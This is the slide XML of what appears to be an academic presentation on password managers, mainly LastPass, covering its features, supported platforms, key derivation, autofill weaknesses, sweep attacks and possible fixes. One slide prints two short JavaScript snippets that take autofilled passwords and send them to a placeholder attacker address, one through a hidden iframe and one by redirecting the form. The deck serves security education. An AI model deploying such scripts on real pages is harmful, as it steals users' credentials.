                        <a:rPr lang="en-CA" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> of use and organization</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CA" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Management efficiency</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CA" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Strong password generation</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CA" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Cross platform</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CA" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Automated updates</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CA" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Easily incorporated</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CA" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Additional features</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CA" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Defense against phishing and pharming</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CA" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Protection vs. Keystroke malware</a:t>
                      </a:r>
                    </a:p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 smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CA" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>Man-in</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>-the-browser attacks</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CA" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Keystroke malware</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CA" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Compromised master password</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CA" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>XSS</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CA" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>Evil</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> coffee shop attackers</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-CA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23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" y="3809599"/>
            <a:ext cx="6766560" cy="963328"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0" err="1" smtClean="0"/>
              <a:t>LastPass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0" smtClean="0"/>
              <a:t> Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6000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8" r="102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2195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917" y="255134"/>
            <a:ext cx="10909737" cy="1036850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="6000" dirty="0" smtClean="0"/>
              <a:t>A little history on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="6000" dirty="0" err="1" smtClean="0"/>
              <a:t>LastPass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="6000" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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972558" y="2000018"/>
            <a:ext cx="10320454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P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2000" dirty="0" smtClean="0"/>
              <a:t>rivately </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2000" dirty="0"/>
              <a:t>held Delaware corporation headquartered in Virginia, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2000" dirty="0" smtClean="0"/>
              <a:t>USA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 smtClean="0"/>
              <a:t>Thirty </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2000" dirty="0"/>
              <a:t>years of combined development, network security and user interface </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2000" dirty="0" smtClean="0"/>
              <a:t>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 smtClean="0"/>
              <a:t>Initial </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2000" dirty="0"/>
              <a:t>release August 22, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2000" dirty="0" smtClean="0"/>
              <a:t>2008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Freemium business </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2000" dirty="0" smtClean="0"/>
              <a:t>model</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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Cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Based</a:t>
            </a:r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309" y="4279162"/>
            <a:ext cx="6780952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5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917" y="255134"/>
            <a:ext cx="10909737" cy="1036850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="6000" dirty="0" smtClean="0"/>
              <a:t>Supported Systems</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="6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594818"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="2136986"/>
          <a:ext cx="1219200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  <a:gridCol w="6096000"/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Operating Systems</a:t>
                      </a:r>
                    </a:p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	Windows 2000, XP, Vista, 7, 8</a:t>
                      </a:r>
                    </a:p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	Mac OS X 10.7+</a:t>
                      </a:r>
                    </a:p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	Linux</a:t>
                      </a:r>
                    </a:p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Web Browsers</a:t>
                      </a:r>
                    </a:p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	Internet Explorer 8+</a:t>
                      </a:r>
                    </a:p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	Firefox 2+</a:t>
                      </a:r>
                    </a:p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	Safari 3+</a:t>
                      </a:r>
                    </a:p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	Google Chrome</a:t>
                      </a:r>
                    </a:p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	Opera 11+</a:t>
                      </a:r>
                    </a:p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	IE Tab in Firefox (using IE Anywhere)</a:t>
                      </a:r>
                    </a:p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	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Maxthon</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-CA" dirty="0" smtClean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	**Users are strongly recommended to</a:t>
                      </a:r>
                    </a:p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                download and run the installer from our</a:t>
                      </a:r>
                    </a:p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                website on all browsers that you regularly use.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-CA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Tablets</a:t>
                      </a:r>
                    </a:p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	Apple iPad and iPad 2</a:t>
                      </a:r>
                    </a:p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	HP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>TouchPad</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-CA" dirty="0" smtClean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	Kindle Fire</a:t>
                      </a:r>
                    </a:p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	Nook Tablet</a:t>
                      </a:r>
                    </a:p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	Android based tablets*</a:t>
                      </a:r>
                    </a:p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Mobile Devices</a:t>
                      </a:r>
                    </a:p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	Android 2+</a:t>
                      </a:r>
                    </a:p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	Blackberry OS 4.2.1+</a:t>
                      </a:r>
                    </a:p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	HP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>webOS</a:t>
                      </a:r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 1.4.5+</a:t>
                      </a:r>
                    </a:p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	iPhone 3GS+ iOS4.3+</a:t>
                      </a:r>
                    </a:p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	Symbian S60 3rd Edition and above</a:t>
                      </a:r>
                    </a:p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	Windows Mobile 5+</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>	Windows Phone 7.1+</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-CA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1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07" y="0"/>
            <a:ext cx="7597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3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6000" dirty="0" smtClean="0"/>
              <a:t>VIDEO DEMO</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="6000"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5" y="2464217"/>
            <a:ext cx="4667250" cy="305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9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6000" dirty="0" smtClean="0"/>
              <a:t>Overview on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="6000" dirty="0" err="1" smtClean="0"/>
              <a:t>LastPass</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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5114617" y="2001420"/>
            <a:ext cx="77208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CA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Automatic form fill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CA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CA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Bookmark lets</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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CA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Secure Notes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CA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Share Credentials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CA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Shared Family Folders ( Premium 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CA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Password generator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CA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Manually and Automatic password change for sites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CA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Virtual Keyboard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CA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Multifactor authentication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CA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One Time Passwords (OTPs)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CA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Auditing passwords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CA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Command line interface ( Enterprise version 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CA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Identities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CA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Importing and Exporting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA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Wi-Fi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA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Passwords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1359804"/>
            <a:ext cx="2381250" cy="2381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9" y="4202023"/>
            <a:ext cx="3252400" cy="2439300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4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="56979" y="3325207"/>
            <a:ext cx="4762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/>
              <a:t>+</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0" smtClean="0"/>
              <a:t>PBKDF2(Cipher, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0"/>
              <a:t>Password, Salt, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Iter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Leng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA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8686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850" y="3809599"/>
            <a:ext cx="6420853" cy="963328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Security Concerns</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="60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6" r="202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47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6000" dirty="0" smtClean="0"/>
              <a:t>How safe are they really?</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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66" y="1701800"/>
            <a:ext cx="6096000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13" y="2582543"/>
            <a:ext cx="1093333" cy="100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2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20261" y="255134"/>
            <a:ext cx="11256579" cy="1036850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="6000" dirty="0" smtClean="0"/>
              <a:t>Autofill Features</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="6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282752"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6620932" y="3333327"/>
          <a:ext cx="5367867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786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SECURITY</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> WEAKNESSES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HTTP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> vs. HTTPS login forms</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Direct HTML change in form method attribute</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Least secure page within the domain</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Large attack surface due to multiple hosted sites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532023637"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="118533" y="1972732"/>
          <a:ext cx="6502400" cy="4334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128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587" y="1249073"/>
            <a:ext cx="8046720" cy="1038977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Presentation Outline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05587" y="2939063"/>
            <a:ext cx="8720090" cy="336714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sz="3600" dirty="0" smtClean="0"/>
              <a:t> Introduction to Password Managers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3600" dirty="0" smtClean="0"/>
              <a:t> Types of managers available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3600" dirty="0" smtClean="0"/>
              <a:t> Analysis on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1" smtClean="0"/>
              <a:t>LastPass</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="romanUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t> Security concerns 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3600" dirty="0" smtClean="0"/>
              <a:t> Conclusion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6000" dirty="0" smtClean="0"/>
              <a:t>Sweep Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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922866" y="1722966"/>
            <a:ext cx="315663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err="1" smtClean="0"/>
              <a:t>iFrame</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="6000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" sz="6000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="6000" dirty="0" smtClean="0"/>
              <a:t>Redirect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" sz="6000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="6000" dirty="0" smtClean="0"/>
              <a:t>Window</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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66" y="2172457"/>
            <a:ext cx="6858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7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" y="255134"/>
            <a:ext cx="11841480" cy="1036850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="6000" dirty="0" smtClean="0"/>
              <a:t>Injection &amp; Extraction Techniques</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="60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08119716"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2039620" y="1727199"/>
          <a:ext cx="8128000" cy="4678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141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" y="255134"/>
            <a:ext cx="11841480" cy="1036850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="6000" dirty="0" smtClean="0"/>
              <a:t>Injection &amp; Extraction Techniques</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="6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662353"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="832273" y="1748366"/>
          <a:ext cx="10682394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1197"/>
                <a:gridCol w="53411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STEALTH CODE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FORM</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> ACTION CODE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function </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" err="1" smtClean="0"/>
                        <a:t>testPassword</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
                        <a:t>() {</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
                        <a:t>   </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" err="1" smtClean="0"/>
                        <a:t>var</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
                        <a:t> password =</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
                        <a:t>   </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" err="1" smtClean="0"/>
                        <a:t>document.forms</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
                        <a:t>[0].</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" err="1" smtClean="0"/>
                        <a:t>password.value</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
                        <a:t>;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
                        <a:t>   if(password != "") {</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
                        <a:t>      </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" err="1" smtClean="0"/>
                        <a:t>var</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
                        <a:t> temp=</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
                        <a:t>      </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" err="1" smtClean="0"/>
                        <a:t>document.createElement</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
                        <a:t>("div");</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
                        <a:t>      </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" err="1" smtClean="0"/>
                        <a:t>temp.innerHTML</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
                        <a:t> +=</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
                        <a:t>      "&lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" err="1" smtClean="0"/>
                        <a:t>iFrame</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" err="1" smtClean="0"/>
                        <a:t>src</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
                        <a:t>=\""+ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" err="1" smtClean="0"/>
                        <a:t>attacker_addr</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
                        <a:t> +</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
                        <a:t>      "?password=" + password +</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
                        <a:t>      "\" style=\"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" err="1" smtClean="0"/>
                        <a:t>display:none</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
                        <a:t>;\" /&gt;";</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
                        <a:t>      </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" err="1" smtClean="0"/>
                        <a:t>document.body.appendChild</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
                        <a:t>(temp);</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
                        <a:t>      </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" err="1" smtClean="0"/>
                        <a:t>clearInterval</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
                        <a:t>(interval);</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
                        <a:t>   }}</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
                        <a:t>   interval = </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" err="1" smtClean="0"/>
                        <a:t>setInterval</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" err="1" smtClean="0"/>
                        <a:t>testPassword</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
                        <a:t>, 50);</a:t>
                      </a:r>
                    </a:p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changer = function() {</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
                        <a:t>   </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" err="1" smtClean="0"/>
                        <a:t>document.forms</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
                        <a:t>[0].action = </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" err="1" smtClean="0"/>
                        <a:t>attacker_addr</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
                        <a:t>;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
                        <a:t>   </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" err="1" smtClean="0"/>
                        <a:t>document.forms</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
                        <a:t>[0].submit();</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
                        <a:t>}</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" err="1" smtClean="0"/>
                        <a:t>setTimeout</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
                        <a:t>(changer, 1000);</a:t>
                      </a:r>
                    </a:p>
                    <a:p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19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" y="255134"/>
            <a:ext cx="11841480" cy="1036850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="6000" dirty="0" smtClean="0"/>
              <a:t>Possible Fixes</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="60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342840141"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2039620" y="1413934"/>
          <a:ext cx="8128000" cy="5444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163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850" y="3809599"/>
            <a:ext cx="6420853" cy="963328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Conclusion</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="60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6" r="202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4322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255134"/>
            <a:ext cx="12192000" cy="1036850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="6000" dirty="0" smtClean="0"/>
              <a:t>In summary…</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="6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34" y="1630817"/>
            <a:ext cx="4267796" cy="24006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34" y="4370285"/>
            <a:ext cx="4267796" cy="240063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229" y="4370284"/>
            <a:ext cx="4267796" cy="240063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229" y="1630817"/>
            <a:ext cx="4267796" cy="24006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344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255134"/>
            <a:ext cx="12192000" cy="1036850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="6000" dirty="0" smtClean="0"/>
              <a:t>Opinion on Password Managers</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="6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58" y="2062943"/>
            <a:ext cx="5714286" cy="4019048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51764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1794" y="142839"/>
            <a:ext cx="11146220" cy="1036850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="6000" dirty="0" smtClean="0"/>
              <a:t>REFERENCES ( Documents )</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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100658" y="1711954"/>
            <a:ext cx="12048491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Betters, E. (October 11, 2013). Password managers explained: The best apps available, and why you need one.  </a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Retrieved </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>from http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>www.pocket-lint.com/news/124283-password-managers-explained-the-best-apps-available-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>and-why-you-need-one</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>Blanchou</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>, M. &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>Youn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>, P. (November 13, 2013). Password managers.  Exposing passwords everywhere.  </a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Retrieved </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>from https://www.isecpartners.com/media/106983/password_managers_nov13.pdf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Embedded Security Subsystem. Retrieved March 23, 2015 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>ThinkWiki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t> </a:t>
            </a:r>
